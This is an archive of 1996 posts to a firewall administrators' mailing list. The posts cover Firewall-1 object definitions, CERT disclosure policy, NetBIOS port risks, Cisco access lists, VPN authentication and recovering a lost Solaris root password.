I am trying to figure out how to define some basic network objects on Firewall-1. I've read the manual thoroughly and am still confused. Perhaps some kind soul can give me a hand.

My internal network is 10.x.x.x (unregistered, IANA recommendation), and is composed of a collection of subnets connected to a backbone. One of the interfaces of my Firewall-1 box will be connected to this backbone. The other interface of the FW-1 box will be connected to my DMZ, which is then routed to the Internet. My intent is to use NAT to translate the internal addresses to valid ones on the DMZ. I believe this is a fairly straightforward and common setup.

I would like to create network objects which represent the internal net and the Internet so that I can proceed with entering rules in the Rule Base. My problem is understanding the specific FW-1 mechanics used to define these objects. Some specific issues:

When defining a network object, the dialog box asks for a particular IP address. This is odd, because IP networks are generally designated x.y.z.0 (I'm assuming class C in this example), where x.y.z is the network portion and .0 represents the network. There is a space for the subnet mask in the dialog box... can I assume that the host portion of the address is ignored and that any host on the resultant net matches that object?

Although I've used class C subnetting on the internal internetwork (multiple nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the FW-1 network object to represent the whole internal network - i.e., 10.x.y.z netmask 255.0.0.0? Would this work, or would I be confusing the system?

Lastly, based on what the manual did contain, I'm thinking the way to represent the Internet is to first define the internal net and then use the negate feature to designate "everything else". Is this accurate?

Any insight would be greatly appreciated, including the mechanics of the process.

Thanks and Regards,
Earl Evans
--
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
[]  Earl Evans                  "I thought,            []
[]  e_evans@ix.netcom.com        therefore I was"      []
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][]

From firewalls-owner Tue Jul 16 16:51:10 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA25028 for firewalls-outgoing; Tue, 16 Jul 1996 16:16:35 -0700 (PDT)
Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA24945 for ; Tue, 16 Jul 1996 16:16:13 -0700 (PDT)
Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id QAA02191; Tue, 16 Jul 1996 16:05:57 -0700 (PDT)
Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3)
Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id QAA17976; Tue, 16 Jul 1996 16:12:26 -0700 (PDT)
From: Brian Murrell
Message-Id: <199607162312.QAA17976@mocha.bctel.net>
Date: Tue, 16 Jul 1996 16:12:25 -0700 (PDT)
To: Russ.Cooper@RC.Toronto.on.ca
Cc: firewalls@GreatCircle.COM
Subject: RE[2]: CERT Advisories (was: Re: Dirty dogs)
In-Reply-To:
X-Mailer: Ishmail 1.2.2-960610-sol24
MIME-Version: 1.0
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

from the quill of Russ on scroll
> Someone from CERT previously spoke up about this in a thread at the
> beginning of the year
>
> their opinion was simply that it didn't make a whole lot of sense to
> tell the world (since its impossible to have a secure mailing list),
> that a hole exists in a piece of code prior to the vendor figuring out
> how to plug it. Sure, by doing so they put the pressure on the vendor to
> make a fix quickly, but at the same time they also expose the possible
> exploit to people whom might otherwise not have figured it out yet,
> thereby leading to more exploits of the hole. Besides, putting pressure
> on the vendors neither guarantees a quick fix, nor a reliable one.

But what if for some the hole is big enough that plugging it means pulling the plug, and they are willing to live with that till a more graceful plug is found rather than run the risk of being exposed. Wouldn't full disclosure ASAA (as soon as available) be right for that group of people?? (Maybe they don't exist :-)

b.
--
Brian J. Murrell                        Brian_Murrell@bctel.net
BCTel Advanced Communications           brian@ilinx.com
Vancouver, B.C.                         brian@wimsey.com
604 454 5279

From firewalls-owner Tue Jul 16 17:06:28 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA27094 for firewalls-outgoing; Tue, 16 Jul 1996 16:56:56 -0700 (PDT)
Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id QAA27085 for ; Tue, 16 Jul 1996 16:56:48 -0700 (PDT)
Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0)
Message-ID:
From: Russ
To: "'Brian Murrell'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: RE[2]: CERT Advisories (was: Re: Dirty dogs)
Date: Tue, 16 Jul 1996 19:51:26 -0400
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Ok, we'll go through this one again. Please don't think I'm oblivious to your concerns, I understand your point.

Let's assume that people would like CERT to notify everyone on their mailing list about *serious* security holes that they are made aware of, simultaneous to their notification of the vendor in question. Ok?

One result is that CERT now becomes the de facto group for determining what you consider *serious*. A second result is that CERT could possibly be held liable for not notifying you of something they deem *not serious*. Since they get to decide what's serious or not, and since they're the ones with their butts in a sling, they decide to just publish every breach or attempt they're notified of, regardless of whether or not it's actually a hole. Now some may consider this a good thing, but do you realize how much traffic this is going to create, and how much hysteria it would generate? Talk about your Denial of Service attack!!!

As for the "group of people" you were referring to, as I said before, it's impossible to separate them from every other legitimate email address in the world. Let's imagine that I'm a Black Hat, I'm not, but let's just imagine for a second. I work for a reputable company and I have a responsible position, but at night, with my own equipment and Internet connection, I like to MedDle iN thE mAdneSs... If I was any good, who would know? Meanwhile, every day, faithfully, CERT would be sending me the same advisories you are getting.

As we all know all too well, not everyone applies the patches or pays attention to advisories. Sure, you might be fine now, but what of all the poor souls who only get their Firewall logs read once a week by an overworked Admin? You're happy and all those other people are out there screaming at CERT for publishing the advisory. It's a no-win situation for them, I believe. I think it's better for them to have a simple mandate, report all reported information to the appropriate vendors as quickly as possible, and then put the pressure on the vendors who do not promptly respond (Microsoft, for example...;-])

Cheers,
Russ
...running MS Exchange Server 4.0 on NT 4.0, the future is here now.
> From firewalls-owner Tue Jul 16 17:48:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA28966 for firewalls-outgoing; Tue, 16 Jul 1996 17:34:41 -0700 (PDT) Received: from morebbs.com (ftp.morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA28959 for ; Tue, 16 Jul 1996 17:34:34 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607162031.0STVW00@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Tue, 16 Jul 96 20:31:20 Subject: Re: ports 137 & 138 To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A couple of folks asked me to give a better explanation of how packets with (IP (UDP (NetBios (Message Server Block command) ) ) ) can pose a threat on ports 137 and 138 >From what I see it works this way 1) Firewalls protect networks 2) Networks frequently contain LAN servers and PCs 3) When you do your sniffing homework and use a sniffer to examine the LAN network operating systems you see that they all follow a layered architecture and they all perform about the same Regardless of the hype from vendors In fact an application that performs poorly on one LAN operating system can usually be observed to perform poorly on other LAN operating systems 4) LAN operating system architecture is like this Networked PC LAN Server Client part of application Server part of application Reads & Writes to Microsoft MSB Reads & Writes to Microsoft MSB Banyan or Novell or Windows NT OS Banyan or Novell or Windows NT OS Some flavor of Unix Some flavor of Unix Intel based PC Intel based Server The LAN applications dont really talk to the LAN operating system. 
They talk to MicroSofts Message Server Block protocol which is simply transported across the network by the LAN operating system 5) MicroSofts Message Server Block protocol is the soft chewy center of the LAN communication between parts of an application You can write your own C code to read and write to Message Server Block through Redirector 6) What manner of beast would receive IP(UDP(NetBios(MSB))) packets over its network interface card and then retransmit the NetBios(MSB) part of the same packet over the same network interface card Well Windows NT and Windows 95 frequently do this And HP OpenView running on desktop HP minis will do the same thing in some configurations 7) The security of networked Windows NT machines is quite poor The security of networked Windows 95 machines is non-existant Of course YOU dont have any of these machines at YOUR site Or at least you pretend you dont know that you do Bet you didn't know that crackers can reconfigure a Windows 95 machine on the fly and reboot it WHILE STILL MAINTAINING THE ORIGINAL NETWORK CONNECTIONS In fact they can connect into it and reboot it so that it uses BootP to grab an IP address from your DHCP server WHILE STILL MAINTAINING THEIR ORIGINAL NETWORK CONNECTION from outside Seen it done Have sniffer traces to prove it 8) Back to firewalls and protecting networks If you permit people to connect into your network through ports 137, 138 or 139 you may get a nasty surprise from some sly cracker who reconfigures part of your network before your realize it At very least they may access your data and applications 9) If you are connected to the Internet and you dont run a firewall then you will get screwed in a way you dont like The only question is when I really dont think I overstated anything Everything mentioned in this post is based on sniffer traces and real life observations by myself and other cyberworld explorers MeOwMyX From firewalls-owner Tue Jul 16 18:18:21 1996 Received: (majordom@localhost) by 
miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA00384 for firewalls-outgoing; Tue, 16 Jul 1996 18:02:03 -0700 (PDT) Received: from dfw-ix5.ix.netcom.com (dfw-ix5.ix.netcom.com [206.214.98.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA00377 for ; Tue, 16 Jul 1996 18:01:57 -0700 (PDT) Received: from EarlEvans.medicalogic.com ([198.107.237.35]) by dfw-ix5.ix.netcom.com (8.6.13/8.6.12) with SMTP id RAA22471 for ; Tue, 16 Jul 1996 17:58:43 -0700 Message-ID: <31EC3B1D.5466@ix.netcom.com> Date: Tue, 16 Jul 1996 18:00:13 -0700 From: Earl Evans Reply-To: e_evans@ix.netcom.com X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1: Network object definition Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody, I am trying to figure out how to define some basic network objects on Firewall-1. I've read the manually thoroughly and am still confused. Perhaps some kind soul can give me a hand. My internal network is 10.x.x.x (unregistered, IANA recommendation), and is composed of a collection of subnets connected to a backbone. One of the interfaces of my Firewall-1 box will be connected to this backbone. The other interface of the FW-1 box will be connected to my DMZ, which is then routed to the Internet. My intent is to use NAT to translate the internal addresses to valid ones on the DMZ. I believe this is a fairly straightforward and common setup. I would like to create network objects which represent the internal net and the Internet so that I can proceed with entering rules in the Rule Base. My problem is understanding the specific FW-1 mechanics used to define these objects. Some specific issues: When defining a network object, the dialog box asks for a particular IP address. 
This is odd, because IP networks are generally designated x.y.z.0 (I'm assuming class C in this example), where x.y.z is the network portion and .0 represents the network. There is a space for the subnet mask in the dialog box...can I assume that the host portion of the address is ignored and that any host on the resultant net matches that object? Although I've used class C subnetting on the internal internetwork (multiple nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the FW-1 network object to represent the whole internal network - i.e., 10.x.y.z netmask 255.0.0.0? Would this work, or would I be confusing the system. Lastly, based on what the manual did contain, I'm thinking the way to represent the Internet is to first define the internal net and then use the negate feature to designate "everything else". Is this accurate? Any insight would be greatly appreciated, including the mechanics of the process. Thanks and Regards, Earl Evans -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] Earl Evans "I thought, [] [] e_evans@ix.netcom.com therefore I was" [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Jul 16 18:48:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA01764 for firewalls-outgoing; Tue, 16 Jul 1996 18:39:51 -0700 (PDT) Received: from mailhub.stratus.com (mailhub.stratus.com [134.111.1.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA01746 for ; Tue, 16 Jul 1996 18:39:43 -0700 (PDT) From: Dick_Wall@stratus.com Received: from na.stratus.com (na.stratus.com [134.111.18.94]) by mailhub.stratus.com (8.7.5/8.7.3) with ESMTP id VAA08645 for ; Tue, 16 Jul 1996 21:36:16 -0400 (EDT) Received: from by na.stratus.com with SMTP X-Openmail-Hops: 1 Date: Tue, 16 Jul 96 21:34:44 -0400 Message-Id: Subject: HTTP ?? 
Mime-Version: 1.0 To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII; name="HTTP" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Do HTTP servers "initiate" connections back to a client ... similar to an FTP server which initiates a port 21 connection back to the client ?? I seem to get hung up once in a while if my web browser is not configured to use an HTTP proxy. I expected HTTP access from server to client to work okay via our firewall routers ... the routers are set to use the "tcp established" option, to allow TCP acks back through the firewall. It normally works okay .. and some of my users say they never have a problem, when the use of a proxy is "not" configured. But occasionally I find that the requests hang. Reconfiguring the browser to use an HTTP proxy cures the problem. Note .. I am talking about HTTP requests .. and not requests to FTP links. Dick From firewalls-owner Wed Jul 17 00:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA10336 for firewalls-outgoing; Wed, 17 Jul 1996 00:41:01 -0700 (PDT) Received: from relay.ioffe.rssi.ru (relay.ioffe.rssi.ru [194.85.224.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id AAA10322 for ; Wed, 17 Jul 1996 00:40:50 -0700 (PDT) Received: from ssrouter.ioffe.rssi.ru by relay.ioffe.rssi.ru with SMTP (8.7.5/Serv-2.12-AS-eef) Date: Wed, 17 Jul 1996 07:35:18 +0400 (MSD) From: Kirill Bolshakov To: Low Taek Jho cc: firewalls Subject: Re: Need some help. In-Reply-To: <199607161355.VAA19736@relay2.jaring.my> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 16 Jul 1996, Low Taek Jho wrote: > Yo, > OK, I'm going on holiday in Aug. And I know that all my mails will fill > up my mailbox and go beyond 4 MB which is my limit on my server. 
I called > up the server and they said that they couldn't do anything to increase to > space. Any ideas how I could let the mails keep on comming in without my > server deleting it? thanks./. > > By, > Jho. > > You can redirect ( via .forward ) your mail to a script, which will discard/save/compress your mail. ------------------------------------------------------------------------- | Research Systems Software Laboratory | Kirill Bolshakov | | Ioffe Institute | raven@ssrouter.ioffe.rssi.ru | ------------------------------------------------------------------------- From firewalls-owner Wed Jul 17 02:33:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14209 for firewalls-outgoing; Wed, 17 Jul 1996 02:15:04 -0700 (PDT) Received: from comsun.chungnam.ac.kr (comsun.chungnam.ac.kr [168.188.48.17]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA14199 for ; Wed, 17 Jul 1996 02:14:39 -0700 (PDT) Received: from ea ([168.188.48.125]) by comsun.chungnam.ac.kr (8.6.9H1/8.9.11h) with SMTP id SAA09503 for ; Wed, 17 Jul 1996 18:12:08 +0900 Message-Id: <199607170912.SAA09503@comsun.chungnam.ac.kr> X-Sender: jypark@comsun.chungnam.ac.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 18:10:22 +1000 To: firewalls@GreatCircle.COM From: Juyoung Park Subject: [HELP] I lost root password! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, This is an very emergency state to me! Someone broken my root password! and make it worse file system is crashing now! I use solaris 2.4, when i used sun os 4.1.3 i can modify root password by single user mode booting.. But whenever I try, it asking me root password.. Could you help me with this problem? How can I re-obtain root password? I know my asking for help is not suitable this mailing list. but nobody can help me.. Anyway, tkank you in advance.. 
From firewalls-owner Wed Jul 17 03:05:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA14983 for firewalls-outgoing; Wed, 17 Jul 1996 02:52:17 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id CAA14976 for ; Wed, 17 Jul 1996 02:52:06 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id LAA15463 for firewalls@greatcircle.com; Wed, 17 Jul 1996 11:49:03 +0200 From: John Betts Message-Id: <199607170949.LAA15463@rbit.co.za> Subject: Cisco ACL's To: firewalls@greatcircle.com Date: Wed, 17 Jul 1996 11:49:02 +0200 (SAT) Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Howdy, can someone here please help me out with the following: I have a cisco4k with 2 serial ports, one ether. eth0 is Lan A, ser0 is Lan B, ser1 is the Internet line. I want everyone on Lan A to be able to access Lan B, and everyone on Lan B to be able to access Lan A. (all ports) Secondly, I want the Internet server (proxy, etc) on Lan A a.b.c.15 to be able to access any machine on the Internet, and any machine on the Internet to access it. What do I need to do to the following access lists to make the above work?
! allow Lan A access to Lan B
access-list permit a.b.c.0 255.255.255.0 a.b.d.0 255.255.255.0
! allow Lan B access to Lan A
access-list permit a.b.d.0 255.255.255.0 a.b.c.0 255.255.255.0
! allow sun1 (Internet server) access to Internet
access-list permit a.b.c.15 255.255.255.? 0.0.0.0 0.0.0.0
! allow Internet access to sun1
access-list permit 0.0.0.0 0.0.0.0 a.b.c.15 255.255.255.?
! deny everything else
access-list deny 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0
tia ciao -- John -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. 
The Sendmail configuration reflects this.
From firewalls-owner Wed Jul 17 03:48:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16431 for firewalls-outgoing; Wed, 17 Jul 1996 03:41:43 -0700 (PDT) Received: from sunmail.vtx.net (mail.vtx.ch [194.51.92.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA16422 for ; Wed, 17 Jul 1996 03:41:27 -0700 (PDT) Received: from tla03 ([194.191.78.3]) by sunmail.vtx.net Message-ID: <31ECBFCE.2889@tla.ch> Date: Wed, 17 Jul 1996 12:26:22 +0200 From: Christian ALT Reply-To: calt@tla.ch X-Mailer: Mozilla 3.0b4Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Authentication necessary when encryption ? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
With encryption between a remote user's laptop and the central site, do you think that authentication is still necessary? This is the point on which I would like to exchange some thoughts. I admit that the encryption keys are unique to any user. Authentication is still necessary to access the resources on the central site. But no longer to access the site itself. In case a laptop gets lost, the site can be compromised. This is a risk we can accept or refuse. 
Any comment on that thought would be appreciated TIA CHA
From firewalls-owner Wed Jul 17 04:03:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA16421 for firewalls-outgoing; Wed, 17 Jul 1996 03:41:27 -0700 (PDT) Received: from kpgwy.kpscal.org (kpgwy.kpscal.org [167.117.0.140]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id DAA16404 for ; Wed, 17 Jul 1996 03:41:09 -0700 (PDT) Received: from mailhub.kp.org ([206.18.242.135]) by kpgwy.kpscal.org (8.6.9/8.6.9) with SMTP id DAA28378 for ; Wed, 17 Jul 1996 03:38:48 -0700 X400-Received: by /c=us/admd=/prmd=kp/; converted ( IA5-Text); Relayed; X400-Received: by mta KPMTA in /c=us/admd=/prmd=kp/; converted ( IA5-Text); X400-MTS-Identifier: [/c=us/admd=/prmd=kp/; 31ECD0B0.CCC8.0C4C.000] Content-Identifier: 0620031ECC30A005 Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: IA5-Text Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: Mark.Moore@kp.org X400-Recipients: non-disclosure; Expiry-Date: 01 Aug 1996 00:00: Z Date: 17 Jul 1996 03:40:10 -0700 From: "Moore, Mark" To: firewalls@GreatCircle.COM (Return requested) (Receipt notification requested) Subject: Satan Program MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Can someone on this list tell me about the SATAN program? Also, are there other programs like SATAN? 
Regards, Mark
From firewalls-owner Wed Jul 17 04:18:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA17621 for firewalls-outgoing; Wed, 17 Jul 1996 04:14:35 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA17614 for ; Wed, 17 Jul 1996 04:14:24 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id NAA04003; Wed, 17 Jul 1996 13:08:35 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171310.AA52823@pamela.sic.se> Date: Wed, 17 Jul 1996 13:10:52 +0100 From: "Stefan Berg" To: Juyoung Park Cc: firewalls@GreatCircle.com Subject: Re: [HELP] I lost root password! Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
> Hello, > This is a very urgent situation for me! > Someone has broken my root password! And to make it worse, the file system > is crashing now! > > I use Solaris 2.4; when I used SunOS 4.1.3 I could modify the root password > by booting into single-user mode.. > But whenever I try, it asks me for the root password.. > > Could you help me with this problem? How can I regain the root password? > I know my asking for help is not suitable for this mailing list, but > nobody can help me.. > > Anyway, thank you in advance.. You could remove and mount the disk on another Solaris machine, and modify the password field in order to regain root access to the system. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. 
see Recursive
From firewalls-owner Wed Jul 17 04:33:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA18102 for firewalls-outgoing; Wed, 17 Jul 1996 04:27:55 -0700 (PDT) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA18066 for ; Wed, 17 Jul 1996 04:27:40 -0700 (PDT) Received: by smtpgate.saa-cons.co.uk (8.6.8.1/1.3-eef) Received: from haddock.saa-cons.co.uk(193.132.156.161) by amnesiac via smap (V1.3) Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) Date: Wed, 17 Jul 1996 12:27:07 +0100 (BST) From: Dave Roberts To: Low Taek Jho Cc: firewalls Subject: Re: Need some help. In-Reply-To: <199607161355.VAA19736@relay2.jaring.my> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
On Tue, 16 Jul 1996, Low Taek Jho wrote: > space. Any ideas how I could let the mails keep on coming in without my > server deleting it? thanks./. A few years ago, I set up a cron job, which made a cp of the mailbox directory '/var/spool/mail/djr' to a local directory. Then reset the mailbox by cat'ing /dev/null onto it. Then finally gzip -9 the copy of the mailbox file. I used 'date' to give me a different filename every night. It worked ok. Nowadays I use procmail, and when I go away, I set it to compress my folders after filing messages into them. The man pages explain how to do this. The filesystem where my $HOME is, is much bigger than /var/spool/mail. Dave Roberts | "Surfing the Internet" is a sad term for sad people. Unix Systems Admin | Get a board, find a beach, surf some REAL waves and SAA Consultants Ltd | get a *real* life. Plymouth, U.K. 
| -=[For PGP Key, send mail with subject of "get pgp"]=-
From firewalls-owner Wed Jul 17 05:03:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA18971 for firewalls-outgoing; Wed, 17 Jul 1996 04:52:30 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA18964 for ; Wed, 17 Jul 1996 04:52:22 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA03699; Wed, 17 Jul 1996 07:54:38 -0500 From: Adam Shostack Message-Id: <199607171254.HAA03699@homeport.org> Subject: Re: Authentication necessary when encryption ? To: calt@tla.ch Date: Wed, 17 Jul 1996 07:54:38 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <31ECBFCE.2889@tla.ch> from "Christian ALT" at Jul 17, 96 12:26:22 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
It's a good idea to use strong authentication on connection (something you {have, know, are}, pick any 2), and then use strong cryptographic authentication on a per-packet basis. While the attacks (other than denial of service, such as spewing random garbage into a session) are somewhat unlikely, and simply using encryption is ***Much*** better than not using it, a crypto hash for authentication is cheap; it's unlikely to slow down any connection a laptop makes. The two-factor authentication protects you, assuming you tell users to keep their cryptocard in their pocket, not their laptop bag. Adam Christian ALT wrote: | With encryption between a remote user's laptop and the central site, do | you think that authentication is still necessary? This is the point on | which I would like to exchange some thoughts. | | I admit that the encryption keys are unique to any user. | | Authentication is still necessary to access the resources on the central | site. But no longer to access the site itself. 
| | In case a laptop gets lost, the site can be compromised. This is a | risk we can accept or refuse. | | Any comment on that thought would be appreciated | | | TIA | CHA | | -- "It is seldom that liberty of any kind is lost all at once." -Hume
From firewalls-owner Wed Jul 17 05:18:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA19808 for firewalls-outgoing; Wed, 17 Jul 1996 05:16:34 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19801 for ; Wed, 17 Jul 1996 05:16:28 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607171213.AA09135@dsacg1.dsac.dla.mil> Subject: Re: [HELP] I lost root password! To: stefan@sic.se (Stefan Berg) Date: Wed, 17 Jul 96 8:13:12 EDT Cc: firewalls@greatcircle.com In-Reply-To: <9607171310.AA52823@pamela.sic.se>; from "Stefan Berg" at Jul 17, 96 1:10 pm Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
> > > Hello, > > This is a very urgent situation for me! > > Someone has broken my root password! And to make it worse, the file system > > is crashing now! > > > > I use Solaris 2.4; when I used SunOS 4.1.3 I could modify the root password > > by booting into single-user mode.. > > But whenever I try, it asks me for the root password.. > > > > Could you help me with this problem? How can I regain the root password? > > I know my asking for help is not suitable for this mailing list, but > > nobody can help me.. > > > > Anyway, thank you in advance.. > boot the machine with the cdrom, or over the net, go through the install procedures, mount the /root file system, modify the shadow file and reboot. this IS documented in the OS docs. 
spayne
From firewalls-owner Wed Jul 17 05:33:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA20254 for firewalls-outgoing; Wed, 17 Jul 1996 05:31:53 -0700 (PDT) Received: from kpgwy.kpscal.org (kpgwy.kpscal.org [167.117.0.140]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA20247 for ; Wed, 17 Jul 1996 05:31:44 -0700 (PDT) Received: from mailhub.kp.org ([206.18.242.135]) by kpgwy.kpscal.org (8.6.9/8.6.9) with SMTP id FAA29450 for ; Wed, 17 Jul 1996 05:29:21 -0700 X400-Received: by /c=us/admd=/prmd=kp/; converted ( IA5-Text); Relayed; X400-Received: by mta KPMTA in /c=us/admd=/prmd=kp/; converted ( IA5-Text); X400-MTS-Identifier: [/c=us/admd=/prmd=kp/; 31ECEA92.CCC8.0C5A.000] Content-Identifier: 0620031ECDCE7009 Content-Return: Allowed X400-Content-Type: P2-1988 ( 22 ) Conversion: Allowed Original-Encoded-Information-Types: IA5-Text Disclose-Recipients: Prohibited Alternate-Recipient: Allowed X400-Originator: Mark.Moore@kp.org X400-Recipients: non-disclosure; Expiry-Date: 01 Aug 1996 00:00: Z Date: 17 Jul 1996 05:30:31 -0700 From: "Moore, Mark" To: firewalls@GreatCircle.COM (Return requested) (Receipt notification requested) Subject: Satan Program MIME-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Can someone on this list tell me about the SATAN program (i.e. what does it actually do?). Also, are there other programs like SATAN? 
Regards, Mark
From firewalls-owner Wed Jul 17 06:03:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA20816 for firewalls-outgoing; Wed, 17 Jul 1996 05:47:02 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA20799 for ; Wed, 17 Jul 1996 05:46:54 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id OAA04161; Wed, 17 Jul 1996 14:41:46 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607171444.AA03196@pamela.sic.se> Date: Wed, 17 Jul 1996 14:44:03 +0100 From: "Stefan Berg" To: Ian Blenke Cc: firewalls@GreatCircle.com Subject: Re: [HELP] I lost root password! Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
